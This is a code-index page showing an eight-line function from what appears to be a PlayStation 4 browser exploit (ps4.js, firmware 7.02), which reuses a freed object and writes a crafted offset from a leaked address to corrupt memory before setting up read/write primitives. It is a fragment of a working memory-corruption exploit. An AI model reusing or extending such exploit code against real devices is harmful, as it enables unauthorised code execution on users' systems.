MCPcopy Create free account
hub / github.com/GamerHack/GamerHack.github.io / confuseTargetObjRound2

Function confuseTargetObjRound2

restore/702/ps4.js:180–187  ·  view source on GitHub ↗
()

Source from the content-addressed store, hash-verified

178 * and before deleteBubbleTree
179 */
180function confuseTargetObjRound2() {
181 if (findTargetObj() === false)
182 die("[!] Failed to reuse target obj.");
183
184 g_fake_validation_message[4] = g_jsview_leak.add(OFFSET_JSAB_VIEW_LENGTH + 5 - OFFSET_HTMLELEMENT_REFCOUNT).asDouble();
185
186 setTimeout(setupRW, 6000);
187}
188
189
190/* Executed after deleteBubbleTree */

Callers

nothing calls this directly

Calls 3

findTargetObjFunction · 0.70
dieFunction · 0.70
addMethod · 0.45

Tested by

no test coverage detected